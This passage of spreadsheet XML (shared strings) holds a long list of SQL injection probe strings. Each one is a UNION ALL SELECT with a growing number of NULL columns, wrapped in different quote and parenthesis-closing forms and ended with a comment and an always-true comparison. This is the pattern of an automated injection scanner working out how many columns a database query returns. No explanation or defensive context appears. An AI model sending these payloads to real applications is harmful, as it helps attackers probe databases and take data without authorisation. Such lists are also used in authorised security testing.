    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "uNqX" LIKE "uNqX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "didG" LIKE "didG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "oaft" LIKE "oaft</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "wxKT" LIKE "wxKT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "rajd" LIKE "rajd</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "saWV" LIKE "saWV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "fQoD" LIKE "fQoD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "mtXg" LIKE "mtXg</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "NVmt" LIKE "NVmt</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "UVOz" LIKE "UVOz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "yaHI" LIKE "yaHI</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Ppmx" LIKE "Ppmx</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "RQsW" LIKE "RQsW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "yXWe" LIKE "yXWe</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "UumX" LIKE "UumX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "KMEq" LIKE "KMEq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "GVtK" LIKE "GVtK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "PzMb" LIKE "PzMb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hyIt" LIKE "hyIt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vgIM" LIKE "vgIM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vdju" LIKE "vdju</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "QuUJ" LIKE "QuUJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "HDYm" LIKE "HDYm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Slvg" LIKE "Slvg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "tgdj" LIKE "tgdj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "RNqA" LIKE "RNqA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jAUw" LIKE "jAUw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "atgA" LIKE "atgA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "fctP" LIKE "fctP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "hsnY" LIKE "hsnY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "jzgq" LIKE "jzgq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "oJeI" LIKE "oJeI</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "KFig" LIKE "KFig</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "jHqB" LIKE "jHqB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RYLR" LIKE "RYLR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "FuOm" LIKE "FuOm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "IcTP" LIKE "IcTP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Lrqn" LIKE "Lrqn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qlJI" LIKE "qlJI</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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( 314 = 314</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3475 = 3475</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5117 = 5117</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2993 = 2993</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4304 = 4304</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8692 = 8692</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5369 = 5369</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 7524 = 7524</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5528 = 5528</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6623 = 6623</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  144 = 144</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6140 = 6140</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  9517 = 9517</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2920 = 2920</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  15 = 15</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2382 = 2382</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  4908 = 4908</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8099 = 8099</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  715 = 715</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6927 = 6927</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4899 = 4899</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8325 = 8325</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4414 = 4414</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8161 = 8161</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7264 = 7264</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3598 = 3598</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3221 = 3221</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7689 = 7689</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2696 = 2696</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 6956 = 6956</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 'OzAT' = 'OzAT</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'qXdc' = 'qXdc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'UWnZ' = 'UWnZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'jVMK' = 'jVMK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'tUTk' = 'tUTk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Mbwt' = 'Mbwt</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Lprv' = 'Lprv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'nNIz' = 'nNIz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ORjH' = 'ORjH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'xuTm' = 'xuTm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'WLBu' = 'WLBu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fgdN' = 'fgdN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DHjU' = 'DHjU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'VkUA' = 'VkUA</t>
  </si>
  <si>
